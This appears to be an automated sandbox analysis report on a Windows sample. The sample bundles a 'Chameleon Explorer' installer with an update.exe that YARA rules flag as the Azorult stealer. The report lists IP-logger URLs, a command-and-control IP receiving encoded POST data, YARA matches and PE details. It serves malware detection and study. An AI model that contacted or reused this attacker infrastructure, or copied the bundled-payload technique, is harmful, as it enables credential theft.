                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336985372.0000000004918000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004916000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384153935.00000000048CF000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337288125.00000000048CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/csp.php;
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336526085.00000000048BB000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.384153935.00000000048CF000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337288125.00000000048CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/csp.php;Persistent-AuthWWW-AuthenticateVaryturnback=info%2Funknown%2F1dHC37%2F;
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/invisible/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/ip-services/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/ip-tracker/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/location-tracker/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/mac-checker/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/my-ip/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.00000000048A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/privacy/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.00000000048A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/rules/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/shortener/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/sms-logger/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/speedtest/
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.000000000490C000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/unknown/2no.co/1dHC37/unknown
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.337029009.0000000004913000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.326690413.0000000004909000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336463957.000000000490C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/unknown/2no.co/1dHC37/unknownLocationETagAuthentication-InfoAgeAccept-RangesLas
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340652993.0000000004860000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.382943701.0000000004860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/unknown/2no.co/1dHC37/unknownkk
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/url-checker/
                      Source: ChameleonExplorer.exe, 00000006.00000002.326211855.000000000152C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neosoft-activator.appspot.com/
                      Source: ChameleonExplorer.exe, 00000006.00000002.326211855.00000000014A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/store/apps/details?id=com.iplogger.android.free&utm_source=site&utm_campaign
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://schema.org
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/iplogger_team
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/iplogger_team
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wl.gl/app
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wl.gl/tg
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323870440.000000000491D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/r/IPLogger_Team/
                      Source: cexplorer.exe, 00000001.00000003.267125159.00000000025F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.267400805.000000007FE92000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.386513237.000000000018E000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000011.00000002.364176712.0000000001535000.00000004.00000020.00020000.00000000.sdmp, ExplorerHelper32.dll.16.drString found in binary or memory: https://www.startssl.com/policy0
                      Source: unknownDNS traffic detected: queries for: 2no.co
                      Source: global trafficHTTP traffic detected: GET /1dHC37 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 2no.co
                      Source: global trafficHTTP traffic detected: GET /unknown/2no.co/1dHC37/unknown HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: iplogger.org
                      Source: global trafficHTTP traffic detected: GET /activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF206F2697DB14BB5EE90B3A8D-DEE4D6E40AA7315F07804DDD9503F87B-E102E85C5423062DBFF8920ECFD0E53F-7E632307063B35A85D7B937531F0F205-DA23DD2618B7306B8B24495E8B2916C0&vrs=3.0.0.505&prg=explorer&uid=c59b80ec3e93e3d2a7920d213840ce6b HTTP/1.1User-Agent: Chameleon Checker NextGen2 (Ver: 3.0.0.505)Host: neosoft-activator.appspot.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /static/?category=install&action=install&label=paid&uid=&prg=explorer HTTP/1.1User-Agent: Chameleon Static (Ver: 3.0.0.505)Host: www.chameleon-managers.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /info/versions/ HTTP/1.1User-Agent: Chameleon checker ( Ver: 3.0.0.505)Host: www.chameleon-managers.comConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.4.5Date: Wed, 22 Feb 2023 07:09:18 GMTContent-Length: 0Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.4.5Date: Wed, 22 Feb 2023 07:09:19 GMTContent-Length: 0Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.15.219.86
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.335833286.0000000004926000.00000004.00000020.00020000.00000000.sdmp, B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.336842417.00000000048AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <a class="footer__social-i fb" href="https://www.facebook.com/iploggerteam" title="Follow us on Facebook" target="_blank"><span class="soc-ico"></span></a> equals www.facebook.com (Facebook)
                      Source: unknownHTTP traffic detected: POST /1/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 51.15.219.86Content-Length: 109Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 3f 2f fb 3e 2f fb 3c 2f fb 3f 2f fb 34 4e 8b 28 38 8c 28 39 ff 28 39 ff 28 39 f8 28 39 fa 28 39 fe 28 39 fd 28 39 f9 4c 2f fb 34 Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/?/>/</?/4N(8(9(9(9(9(9(9(9L/4
                      Source: unknownHTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.184.84:443 -> 192.168.2.3:49705 version: TLS 1.2
                      Source: update.exe, 00000003.00000002.361318770.00000000007EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: User32.DLLGetRawInputDeviceInfoAGetRawInputBufferGetRawInputDataGetRawInputDeviceListRegisterRawInputDevicesGetRegisteredRawInputDevices
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWindows user hook set: 0 mouse C:\Program Files (x86)\Chameleon Explorer\Folder.dllJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                      Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                      Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                      Binary is likely a compiled AutoIt script file
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.344437354.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05627F102_2_05627F10
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_03427F1016_2_03427F10
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeSection loaded: folder.dllJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeSection loaded: folder64.dll
                      Source: is-LI6V8.tmp.2.drStatic PE information: Number of sections : 11 > 10
                      Source: is-EV8UG.tmp.2.drStatic PE information: Number of sections : 11 > 10
                      Source: is-7RNBS.tmp.2.drStatic PE information: Number of sections : 11 > 10
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) 9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) 137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                      Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) 3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                      Source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B1215 NtProtectVirtualMemory,3_2_007B1215
                      Source: cexplorer.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: cexplorer.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: is-89A92.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                      Source: is-89A92.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.327456967.0000000001CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEe vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.327456967.0000000001CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHIVE vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.342568623.00000000047D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEI vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324292117.0000000001EDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324292117.0000000001EDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.328061216.0000000001CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEe vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.328061216.0000000001CD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHIVE vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323901796.00000000047B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEI vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324239185.0000000001ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.324239185.0000000001ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
